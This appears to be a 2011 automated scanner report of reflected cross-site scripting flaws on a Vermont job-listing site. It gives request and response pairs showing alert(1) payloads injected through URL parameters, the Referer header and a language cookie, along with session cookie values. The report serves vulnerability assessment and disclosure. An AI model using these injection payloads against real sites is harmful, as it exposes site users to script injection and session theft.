This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/mn_warn_dsp.cfm?def=false9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:26 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45 was submitted in the FormID parameter. This input was echoed as 8ec4e"style="x:expression(alert(1))"d56a86a0e45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=48ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:32:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d686"style%3d"x%3aexpression(alert(1))"e87098b543f was submitted in the rand parameter. This input was echoed as 3d686"style="x:expression(alert(1))"e87098b543f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=4&rand=4616363d686"style%3d"x%3aexpression(alert(1))"e87098b543f HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:34:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08 was submitted in the securitysys parameter. This input was echoed as 3f014"style="x:expression(alert(1))"bc3565a5b08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08&FormID=4&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:30:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f223f"><a>4f2eeafb0f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:57'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cb2"%3balert(1)//cd290823b76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c1cb2";alert(1)//cd290823b76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enc1cb2"%3balert(1)//cd290823b76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENC1CB2";ALERT(1)//CD290823B76\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d9daa"><img src=a onerror=alert(1)>a6ccc200b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=end9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:21 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end9daa"><img src=a onerror=alert(1)>a6ccc200b23"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 17dbd"><img src=a onerror=alert(1)>abbcf0f134a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:56 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en17dbd"><img src=a onerror=alert(1)>abbcf0f134a">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75aaa"%3balert(1)//0a76fef37a8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 75aaa";alert(1)//0a76fef37a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en75aaa"%3balert(1)//0a76fef37a8; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN75AAA";ALERT(1)//0A76FEF37A8\">
...[SNIP]...
